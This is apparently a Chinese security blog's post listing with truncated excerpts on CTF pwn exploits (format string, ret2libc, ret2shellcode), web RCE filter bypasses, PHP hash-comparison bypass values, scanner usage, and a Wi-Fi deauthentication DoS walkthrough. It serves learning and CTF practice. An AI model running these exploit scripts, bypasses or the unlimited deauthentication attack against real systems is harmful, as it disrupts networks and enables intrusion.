PWN入门-格式化字符串漏洞
PWN入门-格式化字符串漏洞基础知识%n1234567891011#include <stdio.h>void main(){ int i; char str[]="hello"; printf("%s %n\n",str,&i); printf("%d\n",i);};/* hello 6*/
pwntools例题1源码:
12345678910111213#include <cstdio>void main(void){ char str[1024]; while(true){ memset(str,'\0',1024); read(0,str,1024); printf(str); fflush(stdout); }; return 0;};//echo 0 > /proc/sys/ker ...
Web入门-RCE漏洞绕过常用方法
Web入门-RCE漏洞绕过常用方法基础知识空格过滤可代替空格的:
12345678<<>%20%09$IFS$9${IFS}$IFS{cat,/flag}
反斜杠绕过12c\at /flagl\s /
取反绕过构造脚本
1234567<?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n","\r","\n"),"",fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n","\r","\n"),"",fgets(STDIN)); echo '[*] (~'.urlenc ...
Web入门-PHP中MD5与SHA1绕过
Web入门-PHP中MD5与SHA1绕过基础知识弱比较绕过PHP将哈希字符串开头为0e的解释为0。
md5加密后0e开头的:
12345678QLTHNDTQNKCDZO240610708s878926199as155964671as214587387as214587387a0e215962017
sha1加密后0e开头的:
123456aaroZmOkaaK1STfYaaO8zKZFaa3OFF9m0e129063370410932435112
双重md5加密后0e开头的:
1237r4lGXCH2Ksu2JNT3BYMCbDLytmyGm2xQyaLNhWn770hQgrBOjrcqftrlaZk
数组绕过/强比较绕过md5与sha1无法处理数组,都返回NULL。payload:
1?a[]=1&b[]=2
MD5碰撞123if((string)$_POST['a']!==(string)$_POST['b'] && md5($_POST['a'])===md5($_POST[ ...
URLFinder基础操作
URLFinder基础操作用途查找隐藏在页面或js中的敏感或未授权api接口。
常用参数
-u 目标URL
-s 显示指定状态码,all全部
-m 默认1正常抓取 2深入抓取(url只深入一层防抓偏) 3安全深入抓取(过滤delete、remove等敏感路由)
-f 从文件中批量读取URL抓取
-o 结果导出csv文件
常见用法123URLFinder -u http://www.baidu.com -s all -m 2URLFinder -u http://www.baidu.com -s 200,403 -m 2URLFinder -s all -m 2 -f url.txt -o .
PWN入门-ret2libc做题
PWN入门-ret2libc做题[2021 鹤城杯]babyof将puts的got表地址传给rdi,返回到puts的plt表上,将puts的got表地址泄漏,最后再返回到main上。
libc查出bin/sh和system的相对偏移,再构造新利用链打。
可惜垃圾libcsearcher没有这个libc版本,得在线查。
12345678910111213141516171819202122232425262728293031from pwn import *from LibcSearcher import *import structcontext(log_level='debug',os='linux',arch='amd64')elf=ELF('./babyof')p=remote("node4.anna.nssctf.cn",28930)p.recvuntil("Do you know how to do buffer overflow?\n")stac ...
PWN入门-ret2pie做题
PWN入门-ret2pie做题[NISACTF 2022]ezpiePIE保护时基地址随机,先泄漏main地址,直接给了。计算偏移算shell函数地址。
123456789101112from pwn import *context(log_level='debug',os='linux',arch='i386')p=remote("node5.anna.nssctf.cn",28166)p.recvuntil("0x") #地址前缀0xmain_addr=int(p.recv(8),16) #8位地址以16进制形式读p.recvuntil("Input:")elf_base=main_addr-0x770 #计算偏移stack_overflow=b'a'*(0x28+4)shell_addr=p32(elf_base+0x80f) #求真实shell地址payload1=flat([stack_overflow,shell_addr])p.sen ...
PWN入门-ret2shellcode做题
PWN入门-ret2shellcode做题[HNCTF 2022 Week1]ret2shellcode123456789from pwn import *context(log_level='debug',os='linux',arch='amd64')p=remote("node5.anna.nssctf.cn",28261)elf=ELF('./attachment')shellcode=asm(shellcraft.sh()).ljust(0x108,b'a')buff_addr=p64(elf.sym["buff"])payload1=flat([shellcode,buff_addr])p.sendline(payload1)p.interactive()
[GDOUCTF 2023]Shellcode123456789101112131415161718# 64位短shellcode 23字节:\x48\x31\xf6\x56\x4 ...
PWN入门-ret2text做题
PWN入门-ret2text做题[SWPUCTF 2021 新生赛]gift_pwn1checksec 文件名
开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。
没有canary保护,可利用栈溢出来修改eip。
PIE地址随机花没有开启。
12345from pwn import *p=remote('node4.anna.nssctf.cn',28708)payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8p.sendline(payload)p.interactive()
[CISCN 2019华北]PWN1123456from pwn import *context(log_level='debug',arch='amd64',os='linux')p=process('./attachment')payload=b'a'*0x2c+p64(0x ...
对无线路由发起DoS攻击
对无线路由发起DoS攻击先断开连接,查看附近所有WiFi:
1airodump-ng wlan0
记录目标MAC地址,尝试攻击,“-0 0”表示无限次数攻击:
1aireplay-ng -0 0 -a MAC地址 wlan0
很有可能本机与目标路由不在同一信道,尝试更改信道:
1iwconfig wlan0 channel 目标信道
以上流程适用于攻击该无线路由,以下方法为针对目标终端。
查看都有哪些终端连接到该无线路由:
1airodump-ng --bssid 无线路由MAC地址 wlan0
嗅探到目标终端的MAC地址后,再次确认是否在同一信道,尝试进行攻击:
1aireply-ng -0 0 -a 无线路由MAC地址 -c 目标终端MAC地址 wlan0
Kscan初探
Kscan初探端口扫描:
1kscan -t 192.168.217.1/24
存活网段探测:
1kscan --spy
FOFA检索:
1kscan -f 'title="后台管理"' --fofa-size 15
暴力破解:
1kscan -t 127.0.0.1 --hydra
CDN识别:
1kscan -t www.iywaobt.cn